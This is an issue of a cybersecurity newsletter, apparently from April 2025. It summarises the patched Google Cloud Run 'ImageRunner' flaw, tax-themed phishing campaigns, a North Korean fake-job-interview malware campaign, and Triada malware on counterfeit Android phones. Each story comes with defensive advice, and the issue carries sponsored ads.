Apr 05 2025
Welcome to Gone Phishing, your weekly cybersecurity newsletter that understands this is what happens when you Musk it for a chocolate buskuit 😂😂😂 The world economy left the chat 💀💀💀
Patch of the Week! 🩹
First thing’s first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳
Congrats to Google, the cybercriminals are no match… for your patch! 🩹
🚨⚙️ Google Cloud Run Vulnerability Revealed: “ImageRunner” 🐛🚀
Cybersecurity researchers just uncovered ImageRunner, a now-patched privilege escalation flaw in Google Cloud Platform's Cloud Run that could’ve let attackers steal private container images and even inject malware into deployments 😨🐍
🔍 What was the issue?
Malicious users with limited permissions (run.services.update + iam.serviceAccounts.actAs) could:
🔧 Edit Cloud Run services
📦 Pull private container images
🧬 Inject malicious code
Target: images stored in Google Artifact Registry or Google Container Registry in the same project 😬
💣 Potential impact:
Secrets stolen 🗝️
Sensitive data exfiltrated 📤
Reverse shells launched 🐚
All by tricking Cloud Run into using infected container images—like a software supply chain attack from inside the cloud ☁️💥
🛡️ What did Google do?
🔒 As of January 28, 2025, Google patched the issue. Now, any user or service account must have explicit read access to deploy container images. No more sneaky side-loading 😤
✅ You now need the Artifact Registry Reader role (roles/artifactregistry.reader) to deploy from private registries.
📌 Tenable, who discovered the bug, calls this kind of vulnerability “Jenga”—because when one cloud service gets wobbly, the rest stacked on top become vulnerable too 🧱🪜
🧠 Reminder: Cloud security isn’t just IAM policies—it's the invisible glue between services that attackers love to exploit.
🔧 If you're using GCP Cloud Run, make sure:
Your IAM roles are tight 🎯
Your image permissions are reviewed 🔍
You stay up-to-date on patches! 🔐
💡 Defenders, stay alert: the cloud can be a blessing or a backdoor—depending on how well you secure it 🛡️💻
Now, on to this week’s hottest cybersecurity news stories:
💸 Tax doesn’t need to be taxing!! Microsoft says otherwise ⚠️
🧟 Lazarus rises from the dead… AGAIN! Change the record 💿
📲 2,600+ Android phones infected w/ Triada malware… Beware ☠️
Gif by election2020 on Giphy
Microsoft has issued a high-alert warning about multiple phishing campaigns weaponizing tax season as a lure to steal credentials and drop malware. The campaigns are part of a broader phishing-as-a-service (PhaaS) ecosystem dubbed RaccoonO365, enabling threat actors to bypass traditional detection methods and launch highly targeted attacks.
🧨 Key Threats & Techniques
🔹 Themes Used: Fake tax docs, Microsoft 365 login pages, and Docusign requests
🔹 Delivery Methods:
✔️ PDF attachments with URL shorteners (Rebrandly)
✔️ PDFs with QR codes
✔️ Spoofed emails using legit file-sharing & collaboration services
🔹 Redirect Chains: Link > URL shortener > fake login/malware page
🔹 Phishing kits powered by RaccoonO365 PhaaS
🕵️♂️ Notable Payloads Delivered
● Malware / Tool Function
● BruteRatel C4 (BRc4) Red-teaming post-exploitation
● Latrodectus Malware loader (evolved in Feb 2025)
● AHKBot Credential theft & screenshot exfiltration
● GuLoader Payload delivery platform
● Remcos RAT Full remote control
⚠️ BRc4 & Latrodectus were dropped via tax-themed PDFs that evaluated a user's IP/system to decide whether to send malware or a harmless file.
🎯 Campaigns & Targets
📅 February 2025 Campaigns:
● Targeted 2,300+ U.S. organizations (engineering, IT, consulting sectors)
● Emails had empty bodies but malicious PDFs with QR codes
● Redirected to fake Microsoft 365 login pages via RaccoonO365
📅 Another campaign used Facebook ads to lure victims to a fake Windows 11 Pro download site, dropping the Latrodectus loader via BruteRatel.
🛡️ Advanced Obfuscation Tactics
💠 Fake file types (e.g., .lnk files made to look like tax docs)
💠 QR codes used to bypass secure email gateways (SEGs)
💠 Browser-in-the-browser (BitB) attacks mimicking login popups
💠 Abuse of legit services: DocuSign, Adobe, Dropbox, Canva, Zoho
💠 Use of open redirects & URL shorteners to hide phishing links
🧰 How to Stay Protected
✅ Block macros & disable autorun
✅ Use phishing-resistant MFA (e.g., hardware tokens, passkeys)
✅ Educate users about tax-season phishing scams
✅ Implement network protection to block outbound connections to known malicious domains
✅ Leverage modern browsers with phishing protection built-in
Microsoft’s findings show a sophisticated evolution of phishing, where attackers are blending social engineering with stealthy malware loaders and legitimate-looking infrastructure. With tax season being a peak period for these attacks, organizations must remain hyper-vigilant. 🧾💣
Consensus is the world’s longest-running gathering of the global crypto, blockchain, and AI communities.
Celebrated as ‘The Super Bowl of Blockchain’, Consensus will welcome 20,000 attendees shaping the decentralized digital economy to Toronto this May 14-16.
Ready to invest in your future?
Attending is your best bet.
Register & Save 20% with BEEHIIV
A new North Korean hacking campaign is using fake job interviews and the ClickFix technique to infect job seekers in the cryptocurrency sector with a newly discovered Go-based backdoor called GolangGhost. The attack, tracked as ClickFake Interview, is a continuation of the Contagious Interview campaign linked to the Lazarus Group, a hacking unit tied to North Korea’s Reconnaissance General Bureau (RGB).
🎯 Key Targets & Attack Methodology
🔹 Targets:
✔️ Centralized finance (CeFi) companies (Coinbase, Kraken, KuCoin, Tether, etc.)
✔️ Job seekers in business development, asset management, and DeFi
🔹 Attack Flow:
1️⃣ Hackers pose as recruiters on LinkedIn/X and invite targets to a video interview.
2️⃣ Victims are directed to a fake video interview platform (e.g., "Willo").
3️⃣ The platform presents a fake error message requiring a “camera driver” download.
4️⃣ Victims are instructed to execute a malicious script via Command Prompt (Windows) or Terminal (macOS).
5️⃣ The script drops FROSTYFERRET (a stealer) and GolangGhost (a backdoor).
🔹 Key Malware Used
● Malware Function
● GolangGhost Backdoor for data theft & remote control
● FROSTYFERRET Stealer disguised as a Chrome camera permission prompt
● FERRET Initial malware loader
🕵️ Advanced Social Engineering via ClickFix
💠 Uses fake job postings to lure victims
💠 Mimics real video interview platforms
💠 ClickFix method tricks users into manually running malicious scripts
💠 Exploits victim trust in the interview process
🛑 MacOS users are tricked into entering their system password, likely for iCloud Keychain theft.
💼 North Korea’s Expanding IT Worker Scheme in Europe
📢 Google Threat Intelligence Group (GTIG) reports a global expansion of North Korea’s fraudulent IT worker operations into Europe.
🔹 Key Trends:
✔️ North Koreans posing as remote IT workers to infiltrate Western firms
✔️ Fake identities claiming to be from Italy, Japan, Vietnam, and the U.S.
✔️ Work in web development, blockchain, bot development
✔️ Use of GitHub to build fake portfolios
🔹 Recent Tactics:
✔️ Targeting companies with BYOD (Bring Your Own Device) policies
✔️ Extortion – demanding ransom from employers to prevent data leaks
🚨 "Europe needs to wake up fast. North Korea’s cyber threats are not just a U.S. problem." – Google Threat Intelligence Group
🛡️ How to Stay Protected
✅ Verify job offers – Don’t download software for interviews
✅ Use endpoint security – Block unauthorized script execution
✅ Be wary of LinkedIn/X job offers from unknown recruiters
✅ Adopt strong authentication – Enable phishing-resistant MFA
✅ Monitor for fake employee identities in remote hiring processes
North Korea continues to innovate in cybercrime, blending social engineering, supply chain infiltration, and IT worker fraud to fund its regime. As cryptocurrency remains a prime target, businesses and job seekers must stay vigilant against evolving tactics. 🛡️
Be the smartest person in the room by reading 1440! Dive into 1440, where 4 million Americans find their daily, fact-based news fix. We navigate through 100+ sources to deliver a comprehensive roundup from every corner of the internet – politics, global events, business, and culture, all in a quick, 5-minute newsletter. It's completely free and devoid of bias or political influence, ensuring you get the facts straight. Subscribe to 1440 today.
🚨 Fake Android Phones Preloaded with Malware Targeting Users Worldwide 🌍
Counterfeit smartphones are being sold at reduced prices, but they come preloaded with a dangerous Android malware called Triada. The latest version of this malware gives attackers full control over infected devices, allowing them to steal sensitive data, hijack cryptocurrency transactions, and spread malware via messaging apps.
🛑 Affected Users: More than 2,600 devices worldwide, majority in Russia
📅 Attack Window: March 13 – 27, 2025
🔎 Malware: Triada RAT (Remote Access Trojan)
📌 What is Triada?
Triada is a modular Android malware first discovered in 2016 that has evolved into a sophisticated backdoor. It can:
🔹 Steal user credentials from Telegram, TikTok, and other social apps
🔹 Send and delete WhatsApp and Telegram messages without the user’s knowledge
🔹 Replace cryptocurrency wallet addresses in clipboard (clipper attack)
🔹 Monitor web browser activity and manipulate links
🔹 Replace phone numbers during calls
🔹 Intercept SMS messages and subscribe victims to premium SMS services
🔹 Download additional malware
🔹 Block network connections to avoid detection
🔥 How is Triada Spread?
🚨 Preloaded in Counterfeit Android Devices
✔️ Triada is embedded in the system firmware during manufacturing
✔️ Users cannot remove it without flashing a clean system image
✔️ Sold through third-party marketplaces and supply chain compromises
📡 Previously Spread via Malicious Apps
✔️ Fake WhatsApp mods (FMWhatsApp, YoWhatsApp)
✔️ Fake Android framework backdoors (BADBOX campaign)
💡 Google’s 2019 investigation found a third-party vendor called Yehuo/Blazefire was responsible for infecting system images with Triada.
🛑 Why is This Dangerous?
1️⃣ Difficult to Remove – It's embedded in the system framework of the phone.
2️⃣ Spreads via Messaging Apps – Can send malware-laden messages from your WhatsApp/Telegram.
3️⃣ Steals Crypto Funds – Can hijack and replace wallet addresses.
4️⃣ Intercepts Calls & Messages – Perfect for espionage and fraud.
5️⃣ Generates Massive Revenue for Hackers – Triada authors have transferred $270,000+ in cryptocurrency in just nine months.
🛡️ How to Protect Yourself
✅ Avoid buying off-brand or counterfeit Android devices
✅ Purchase from reputable retailers and official brand stores
✅ Check for unusual permissions & network activity
✅ Use security apps that can detect system malware
✅ Keep your device updated and avoid sideloading apps
✅ Be cautious of WhatsApp mods & unofficial APKs
🚨 Triada remains one of the most complex and dangerous Android threats.
Hackers continue to compromise supply chains to pre-install malware on devices before they even reach consumers.
🔥 More Android Threats Emerging
🔴 Crocodilus & TsarBot – Android banking trojans targeting 750+ financial apps
🔴 Salvador Stealer – Masquerades as an Indian banking app to steal sensitive user data
🔴 Cosiloon – Another malware pre-installed on low-end Android phones
As hackers refine their tactics, users must be extra vigilant when purchasing Android devices and installing apps. 📲🔒
🗞️ Extra, Extra! Read all about it! 🗞️
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅
💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓
📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾
Let us know what you think.
So long and thanks for reading all the phish!
